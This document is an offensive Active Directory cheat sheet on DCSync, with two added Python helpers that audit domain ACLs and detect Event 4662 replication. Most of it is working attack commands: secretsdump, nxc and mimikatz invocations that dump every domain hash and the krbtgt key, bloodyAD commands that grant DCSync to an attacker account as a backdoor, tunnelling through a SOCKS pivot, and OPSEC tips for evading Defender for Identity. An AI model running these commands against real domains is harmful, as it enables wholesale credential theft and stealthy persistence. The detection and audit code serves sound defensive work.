DCSync


The DRSUAPI-based credential dump. With the right rights, you ask the DC to replicate every account’s credential material to you. No code execution on the DC needed.

DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'

i. Who has DCSync rights by default

These groups have the DS-Replication-Get-Changes + DS-Replication-Get-Changes-All extended rights on the domain object:

  • Domain Admins
  • Enterprise Admins
  • Administrators (BUILTIN)
  • Domain Controllers
  • Read-only Domain Controllers (partial)
  • Account Operators (not by default; only where specific ACLs grant it in some configurations)
  • Any account explicitly delegated the right (Exchange installs, monitoring tools, third-party syncs)

ii. Find DCSync-capable principals

BloodHound query:

MATCH p=(u)-[r:GetChanges|GetChangesAll|DCSync]->(d:Domain)
RETURN u.name, d.name

bloodyAD LDAP query (looks at domain ACEs for the two extended rights):

## Show the domain object's ACL, look for the GetChanges* rights:
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object "DC=corp,DC=local" --resolve-sd

nxc check:

nxc ldap $DC -u $USER -p $PASS -M daclread -o TARGET='Domain Admins'

iii. Full DCSync - dump everything

Pull every account’s NTLM hash, Kerberos keys, password history:

impacket-secretsdump $DOMAIN/Administrator:$PASS@$DC
## With hash:
impacket-secretsdump -hashes :$NTHASH $DOMAIN/$USER@$DC
## With Kerberos:
impacket-secretsdump -k -no-pass $DOMAIN/$USER@$DC

Output (printed to stdout unless -outputfile is given):

  • NTLM hashes, one line per account (user:RID:LM:NTLM:::)
  • a cleartext section with anything stored in cleartext (LSA secrets, etc)
  • a Kerberos section with the AES keys

Pipe to specific files:

impacket-secretsdump $DOMAIN/Administrator:$PASS@$DC -outputfile dump
## dump.ntds = NTLM hashes
## dump.ntds.kerberos = AES keys
## dump.ntds.cleartext = anything in cleartext

iv. Targeted DCSync - just specific accounts

When you only need a specific user (less noisy, smaller output):

impacket-secretsdump -just-dc-user Administrator $DOMAIN/$USER:$PASS@$DC
impacket-secretsdump -just-dc-user krbtgt $DOMAIN/$USER:$PASS@$DC
impacket-secretsdump -just-dc-user 'CORP\Administrator' $DOMAIN/$USER:$PASS@$DC
## Multiple users at once not supported, run per-user

The krbtgt hash is the goal for golden-ticket persistence (see Persistence). Always pull it once you have DCSync.

v. Only NTLM hashes (skip Kerberos keys, skip history)

Fastest, smallest output:

impacket-secretsdump -just-dc-ntlm $DOMAIN/$USER:$PASS@$DC

vi. Include password history (for password reuse analysis)

impacket-secretsdump -history $DOMAIN/$USER:$PASS@$DC

Output includes _history0, _history1, etc. per user. Useful for cracking old hashes that may still work elsewhere, or for predicting the next password.

vii. nxc one-shot DCSync

nxc smb $DC -u $USER -p $PASS --ntds
nxc smb $DC -u $USER -p $PASS --ntds --user Administrator
nxc smb $DC -u $USER -H $NTHASH --ntds

Behind the scenes this uses secretsdump, but stores the results in nxc’s database for cross-host reuse.

viii. Mimikatz DCSync (from Windows)

mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:corp.local /all /csv

Output for golden ticket use:

Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
...
Credentials:
  Hash NTLM: 0123456789abcdef0123456789abcdef         <-- krbtgt NT hash
  ntlm-0:   0123456789abcdef0123456789abcdef
* Primary:Kerberos-Newer-Keys *
  Default Salt: CORP.LOCALkrbtgt
  Default Iterations: 4096
  Credentials:
    aes256_hmac (4096): abcdef...                     <-- AES256 key (preferred for diamond tickets)
    aes128_hmac (4096): ...
    des_cbc_md5 (4096): ...

ix. Granting DCSync to a controlled account

You’re DA temporarily (token theft, Kerberos abuse) and want long-term access. Grant DCSync to a non-privileged user; you lose nothing if your DA access is revoked:

bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC add dcsync svc_user
## Now svc_user can DCSync anytime
bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC add dcsync attacker

Cleanup:

bloodyAD -d $DOMAIN -u Administrator -p $ADMINPASS --host $DC remove dcsync svc_user

This is the cleanest persistence backdoor short of forging tickets, see Persistence.

x. DCSync through a SOCKS pivot

You compromised an internal host and reached the DC through a SOCKS tunnel:

proxychains -q impacket-secretsdump -just-dc-user krbtgt $DOMAIN/$USER:$PASS@$DC

Make sure the FQDN of the DC resolves (or use -dc-ip). The DRSUAPI traffic runs over RPC on dynamic high ports, which proxychains handles fine for TCP.

xi. DCSync requirements you need to know

DCSync calls DRSUAPI’s GetNCChanges. The DC validates:

  • Caller has DS-Replication-Get-Changes AND DS-Replication-Get-Changes-All on the NC head (the domain object)
  • Caller is either a DC machine account, or a user/group explicitly granted the rights

DS-Replication-Get-Changes-In-Filtered-Set is an additional right for some filtered attributes but not strictly needed for hash dumps.

When DCSync fails with STATUS_ACCESS_DENIED, you don’t have the rights. Recheck the ACE list:

bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get object "DC=corp,DC=local" --resolve-sd
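An added audit helper (not bloodyAD or nxc code) that applies the rule from this section and section ii to a domain-object ACL: a trustee can DCSync only if it ends up with BOTH DS-Replication-Get-Changes and DS-Replication-Get-Changes-All after deny ACEs, and GENERIC_ALL or an untyped CONTROL_ACCESS ACE implies every extended right. The ACE dicts and the CORP trustee names are a constructed sample shaped like resolved --resolve-sd output.

```python
from collections import defaultdict

# Well-known extended-right GUIDs on the domain NC head.
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPL_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}
NEEDED = {GET_CHANGES, GET_CHANGES_ALL}       # both required for GetNCChanges

# Trustees that hold both rights out of the box (section i); anything else is delegated.
DEFAULT_TRUSTEES = {"CORP\\Domain Admins", "CORP\\Enterprise Admins",
                    "BUILTIN\\Administrators", "CORP\\Domain Controllers"}

def granted_rights(ace):
    """Replication rights one ACE confers: a CONTROL_ACCESS ACE names a single
    extended right via object_type; GENERIC_ALL or an untyped CONTROL_ACCESS
    ACE covers all of them."""
    if ace["mask"] == "GENERIC_ALL" or (ace["mask"] == "CONTROL_ACCESS" and ace["object_type"] is None):
        return set(REPL_RIGHTS)
    if ace["mask"] == "CONTROL_ACCESS" and ace["object_type"] in REPL_RIGHTS:
        return {ace["object_type"]}
    return set()

def dcsync_capable(aces):
    """{trustee: effective rights} for trustees holding both needed rights
    once DENY ACEs are subtracted."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for ace in aces:
        (allowed if ace["type"] == "ALLOW" else denied)[ace["trustee"]] |= granted_rights(ace)
    return {t: r - denied[t] for t, r in allowed.items() if NEEDED <= r - denied[t]}

def delegated_dcsync(aces):
    """DCSync-capable trustees outside the default set: the Exchange, monitoring
    and third-party sync accounts section i warns about."""
    return sorted(t for t in dcsync_capable(aces) if t not in DEFAULT_TRUSTEES)

# Constructed sample ACL for DC=corp,DC=local (not real output).
SAMPLE_ACL = [
    {"trustee": "CORP\\Domain Admins", "type": "ALLOW", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES},
    {"trustee": "CORP\\Domain Admins", "type": "ALLOW", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES_ALL},
    {"trustee": "CORP\\svc_user", "type": "ALLOW", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES},
    {"trustee": "CORP\\svc_user", "type": "ALLOW", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES_ALL},
    {"trustee": "CORP\\svc_backup", "type": "ALLOW", "mask": "GENERIC_ALL", "object_type": None},
    {"trustee": "CORP\\svc_backup", "type": "DENY", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES_ALL},
    {"trustee": "CORP\\Read-only Domain Controllers", "type": "ALLOW", "mask": "CONTROL_ACCESS", "object_type": GET_CHANGES},
]

if __name__ == "__main__":
    for trustee in delegated_dcsync(SAMPLE_ACL):
        print("delegated DCSync right:", trustee)
```

svc_backup is dropped despite GENERIC_ALL because the deny on Get-Changes-All removes one of the two required rights; the RODC group holds only Get-Changes, which matches the "partial" note in section i.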

xii. Read-Only Domain Controllers (RODC)

RODCs only replicate the credentials of accounts in the “Password Replication Policy” allowed list. You can DCSync against an RODC and get only those creds.

When the RODC machine account is in Allowed RODC Password Replication Group, you can DCSync its own krbtgt and forge “RODC Golden Tickets” that work against the RODC but not the writable DC.

nxc smb $RODC -u $USER -p $PASS -M rdcheck                  ## list cached accounts
impacket-secretsdump -just-dc-user 'krbtgt_RODC' $DOMAIN/$USER:$PASS@$RODC

xiii. OPSEC

DCSync generates:

  • Event 4662 on the DC: directory service access, with the GUID of the replication right
  • Often flagged by ATP/Defender for Identity as a high-severity alert

The DC event has the source IP. On real engagements:

  • Do it once, dump everything, exit fast
  • Use the DC’s machine account itself if possible (less anomalous than a user account)
  • Skip DCSync if AD ATP / MDI is in play, use NTDS.dit VSS snapshot (less alerting) - see Credential Dumping section ii
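The 4662 detection described above, as an added example that is not part of the original page: it classifies exported 4662 field dicts by the replication-right GUIDs in Properties, treats only the exact machine accounts of known DCs as expected (a trailing "$" alone is not enough, since any computer account has one), and joins SubjectLogonId against the 4624 logon table to recover the source IP. The DC names, logon IDs, IPs and events are constructed for the example.

```python
import re

# Extended-right GUIDs logged in the 4662 Properties field when the DC
# authorises GetNCChanges on the domain NC head.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Exact machine accounts of the real DCs (assumed names for this example;
# build the set from the Domain Controllers OU in production).
KNOWN_DCS = {"DC01$", "DC02$"}

def classify_4662(event, logons=None):
    """Return (verdict, rights, source_ip) for one 4662 event.
    verdict is None when no replication right was exercised, "expected"
    for a known DC machine account, otherwise "ALERT". The source IP comes
    from the matching 4624 logon (`logons` maps LogonId -> IpAddress)."""
    found = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    rights = sorted(REPL_GUIDS[g] for g in found if g in REPL_GUIDS)
    if not rights:
        return None, [], None
    ip = (logons or {}).get(event.get("SubjectLogonId"))
    verdict = "expected" if event["SubjectUserName"] in KNOWN_DCS else "ALERT"
    return verdict, rights, ip

def dcsync_alerts(events, logons):
    """(user, source_ip, rights) for every non-DC principal that replicated."""
    alerts = []
    for ev in events:
        verdict, rights, ip = classify_4662(ev, logons)
        if verdict == "ALERT":
            alerts.append((ev["SubjectUserName"], ip, rights))
    return alerts

# Constructed sample events (not real log output).
GC, GCA = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "SubjectLogonId": "0x3e7", "Properties": f"{GC} {GCA}"},
    {"SubjectUserName": "svc_user", "SubjectLogonId": "0x5b2c1", "Properties": f"{GC} {GCA}"},
    {"SubjectUserName": "WS-FINANCE$", "SubjectLogonId": "0x7a10", "Properties": f"{GC} {GCA}"},
    {"SubjectUserName": "jdoe", "SubjectLogonId": "0x9001", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]
SAMPLE_4624 = {"0x5b2c1": "10.10.11.77", "0x7a10": "10.10.11.80"}  # LogonId -> IpAddress

if __name__ == "__main__":
    for user, ip, rights in dcsync_alerts(SAMPLE_4662, SAMPLE_4624):
        print(f"DCSync by {user} from {ip or 'unknown'}: {', '.join(rights)}")
```

The "$" account on a workstation is alerted because it is not in KNOWN_DCS, which is the case the "use the DC's machine account" OPSEC advice above is trying to blend into.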

xiv. After DCSync

You have every NTLM hash in the domain. Next steps:

  • Crack the highest-value accounts (DA, EA, important service accounts), see Password Cracking
  • PtH to any host with the krbtgt or admin hash, see Lateral Movement
  • Forge golden tickets for persistence, see Persistence
  • Re-collect BloodHound - every account is now “owned”

The cracked password is gold

Even with NTLM, getting the actual cleartext often unlocks more (encrypted backups, app logins, SaaS, VPN). Always try to crack DA passwords even when PtH works.